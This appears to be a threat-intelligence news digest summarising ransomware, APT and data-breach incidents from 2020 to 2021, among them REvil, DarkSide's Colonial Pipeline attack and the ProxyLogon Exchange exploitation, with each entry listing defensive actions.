The ransomware gang REvil has abruptly disappeared from the internet following its high-profile Kaseya supply-chain attack, which impacted over one million systems. Known for pioneering double extortion tactics, REvil’s shutdown coincides with bans from Russian-speaking cybercriminal forums and may reflect law enforcement pressure or financial gain. Meanwhile, affiliates may migrate to groups like Prometheus, which continues to operate while distancing itself from REvil. Other emerging threats include HelloKitty ransomware targeting VMware ESXi and SonicWall devices, exploiting unpatched vulnerabilities to encrypt virtual machines and compromise technology infrastructure.
Why it matters:
REvil’s exit and ongoing ransomware activity highlight the evolving ransomware landscape, showing that high-impact attacks draw intense scrutiny and increase risk of operational disruption and permanent data loss for victims.
Immediate Actions:
- Ensure backups are current and tested for critical systems
- Apply patches to VMware ESXi, SonicWall, and other vulnerable infrastructure
- Monitor for ransomware activity and double extortion attempts
- Educate staff on phishing and supply-chain attack tactics
- Review incident response plans and recovery procedures
Read Full Report Here
DarkSide clogs Colonial Pipeline in major ransomware attack
05/14/2021
In May 2021, the ransomware group DarkSide disrupted Colonial Pipeline, forcing a shutdown of 5,500 miles of US fuel pipelines and triggering regional emergency declarations. The attack, likely conducted by a DarkSide affiliate, underscores how ransomware targeting critical infrastructure can have immediate societal impact. DarkSide operates as a RaaS (ransomware-as-a-service), vetting affiliates and providing customizable ransomware, while other groups like Ryuk and UNC2529 exploited cracked software and phishing campaigns against research institutes and global organizations. DDoS attacks also targeted over 200 Belgian government and education websites, highlighting the ongoing threat to essential services.
Why it matters:
Attacks on critical infrastructure and high-profile targets demonstrate the severe operational, financial, and reputational risks posed by ransomware and coordinated cyber campaigns.
Immediate Actions:
- Ensure offline and tested backups for critical systems
- Patch vulnerable software and enforce endpoint protection
- Monitor for ransomware activity and suspicious affiliate access
- Train staff on phishing, social engineering, and malware risks
- Implement DDoS mitigation and network monitoring for critical services
Read Full Report Here
Microsoft Exchange Server flaws inspire 30,000-plus cyber attacks
03/19/2021
In March 2021, four zero-day vulnerabilities in Microsoft Exchange Servers—collectively dubbed ProxyLogon and related flaws—were actively exploited by multiple APT groups, including HAFNIUM, Tick, LuckyMouse, Winnti Group, and others. Exploitation enabled attackers to deploy web-shells, steal data, install malware, and even provide initial access for ransomware like DearCry. Daily attacks spiked from 700 to 7,200 within a week, exacerbated by proof-of-concept (PoC) exploit code shared online. The incident illustrates how quickly zero-days can be weaponized and highlights the persistent risk to unpatched third-party software.
Why it matters:
Organizations relying on Exchange Servers—spanning government, private sector, and Fortune 500 companies—faced immediate compromise risk. The attack underscores the dangers of supply-chain vulnerabilities, as threat actors exploited trusted third-party software to scale attacks efficiently.
Immediate Actions:
- Disconnect affected Exchange Servers from the Internet until fully patched.
- Apply Microsoft’s security updates and manual patches using administrator accounts.
- Conduct forensic analysis: memory, registry hives, web logs, and event logs.
- Ensure antivirus/EDR tools are updated and configured to detect Indicators of Compromise.
- Monitor for unusual account activity and exposed employee credentials.
- Review and secure third-party integrations to limit supply-chain exposure.
Other notable incidents during the same period included F5 BIG-IP device vulnerabilities, a Verkada security camera breach by hacktivists, and the launch of DarkSide 2.0 ransomware-as-a-service, emphasizing the broad spectrum of cyber risks to organizations.
Read Full Report Here
Decryptor release kicks “professional” DarkSide ransomware group into action
01/15/2021
The sophisticated DarkSide ransomware group recently responded to the release of a free decryptor that could restore encrypted files without paying ransom. Operating under a ransomware-as-a-service model, DarkSide targets organizations globally, combining encryption with data exposure in double-extortion schemes. Despite the decryptor’s limited success, the group quickly patched vulnerabilities, issued compensation, and maintained a professional public presence. This incident highlights the evolving business-like strategies of ransomware operators and the persistent threat to all sectors.
Why it matters:
Even with available decryptors, organizations remain at risk of data exposure and extortion, underlining the need for robust security and incident response measures.
Immediate Actions:
- Verify backups and ensure they are offline and recoverable
- Implement strict access controls and monitor privileged accounts
- Educate staff on phishing and social engineering tactics
- Regularly update and patch systems to reduce exploit opportunities
- Monitor for unauthorized data exfiltration and ransomware indicators
Read Full Report Here
Newly identified FIN11 debuts tenacious ransomware tactics
10/23/2020
The financially motivated FIN11 group has emerged with advanced Clop ransomware, capable of encrypting and exfiltrating sensitive data. Active since at least 2016, FIN11 continually refines its tactics to maintain persistence and evade detection, often re-infecting organizations even after initial remediation. Technical analysis shows overlaps with the TA505 group, suggesting shared methodologies, though no formal link is confirmed. All sectors are at risk, highlighting the threat’s ongoing relevance.
Why it matters:
FIN11’s persistence and sophisticated ransomware can lead to prolonged operational disruption, data loss, and potential regulatory consequences.
Immediate Actions:
- Ensure robust offline backups and verify recovery procedures
- Enhance network segmentation and limit lateral movement
- Deploy endpoint detection and continuous monitoring for ransomware activity
- Conduct phishing and social engineering awareness training
- Audit access logs for unusual or repeated intrusion attempts
Read Full Report Here
FIN7/Carbanak OpSec failure reveals group's tools, plans
09/11/2020
A lapse in operational security by the notorious FIN7 group exposed their upcoming tools, campaigns, and underground affiliations. Researchers gained access to FIN7’s communication channels, revealing the development of a new loader, Tirion, intended to replace the legacy Carbanak backdoor. This exposure provides rare insight into the group’s evolving tactics and highlights the ongoing threat they pose to organizations globally.
Why it matters:
FIN7 continues to innovate malware for financial gain, and understanding their operations helps organizations anticipate and defend against future attacks.
Immediate Actions:
- Monitor for Tirion and Carbanak-related indicators of compromise
- Strengthen email and network defenses against phishing campaigns
- Review and update endpoint security solutions
- Audit privileged accounts and limit unnecessary access
- Implement continuous monitoring for unusual network activity
Read Full Report Here
ShinyHunters “second stage” exposes 26 companies’ data in 2 weeks
07/31/2020
The ShinyHunters threat group has returned with a second wave of data leaks, exposing over 408 million records from 26 companies across technology, media, travel, e-commerce, finance, and education. This follows their earlier 2020 campaign that compromised more than 300 million user records. The scale and diversity of affected organizations underscore the group’s persistence and the ongoing risk of large-scale data breaches.
Why it matters:
Exposed records increase the risk of identity theft, phishing, and credential abuse, impacting both businesses and customers.
Immediate Actions:
- Notify affected users and reset compromised credentials
- Monitor for unusual account activity and potential fraud
- Implement multi-factor authentication across all systems
- Audit exposed systems for vulnerabilities and patch promptly
- Review and enhance data protection and encryption practices
Read Full Report Here
Attackers exploit Samsung and university domains in phishing campaign
06/26/2020
A new phishing campaign has been uncovered targeting Samsung and University of Oxford domains, exploiting an Adobe Campaign redirection flaw. Attackers used compromised mail servers to deliver heavily obfuscated emails that redirected users to fraudulent Office 365 login pages, aiming to steal credentials. This campaign demonstrates the ongoing threat of sophisticated, targeted phishing attacks against high-profile organizations.
Why it matters:
Credential theft from these campaigns can lead to unauthorized access, data breaches, and wider organizational compromise.
Immediate Actions:
- Educate users on recognizing phishing emails and suspicious links
- Monitor login attempts and enable multi-factor authentication
- Patch Adobe Campaign and related vulnerabilities promptly
- Audit email servers for unauthorized use or redirection
- Deploy email filtering to detect obfuscated phishing messages
Read Full Report Here
New threat group ShinyHunters exposes 18 companies
05/22/2020
The ShinyHunters group has leaked databases from at least 18 companies, exposing over 266 million user records across education, media, e-commerce, and technology sectors. The group has circulated the data on dark web marketplaces and forums and hinted at a potential second wave of leaks. Their tactics resemble those of the earlier GnosticPlayers group, signaling continued large-scale data breach activity.
Why it matters:
Exposed user records increase the risk of identity theft, phishing attacks, and account compromise for affected organizations and customers.
Immediate Actions:
- Notify impacted users and enforce credential resets
- Implement multi-factor authentication on all accounts
- Monitor for suspicious login attempts and fraud activity
- Audit systems for further vulnerabilities and patch promptly
- Strengthen data encryption and storage practices
Read Full Report Here
APT 37 re-emerges, exploits cloud for espionage
04/10/2020
After a brief lull, the North Korean threat group APT37 has resumed cyber-espionage operations using spearphishing campaigns targeting individuals with lures about North Korean refugees. The March 2020 campaign leveraged cloud platforms to distribute malware via hyperlinks, bypassing traditional security tools and avoiding attachment detection. This marks APT37’s first activity since Microsoft seized 50 of their domains, highlighting the group’s persistence and intelligence-gathering focus.
Why it matters:
APT37’s continued activity threatens sensitive data, particularly in government, research, and international relations contexts, despite prior domain seizures.
Immediate Actions:
- Educate users on phishing tactics and suspicious hyperlinks
- Implement URL filtering and cloud security monitoring
- Deploy endpoint detection for malware from non-attachment vectors
- Audit access to sensitive data and privileged accounts
- Monitor for anomalous activity and unusual network traffic
Read Full Report Here
Sophisticated TA505 spear phishing campaigns thrive and evolve
03/13/2020
The financially motivated threat actor TA505 has continued spearphishing campaigns through late 2019 and early 2020, frequently deploying new or updated malware to evade detection. Targeting multiple sectors, TA505 relies on phishing as its primary access method, demonstrating that even well-known attack vectors remain highly effective. The group is expected to maintain persistent activity throughout 2020.
Why it matters:
TA505’s campaigns highlight the ongoing risk of credential compromise, malware infection, and potential operational disruption via phishing.
Immediate Actions:
- Conduct phishing awareness training for all employees
- Enable multi-factor authentication on critical accounts
- Monitor email traffic and suspicious login attempts
- Deploy advanced malware detection and endpoint monitoring
- Regularly update software and patch known vulnerabilities
Read Full Report Here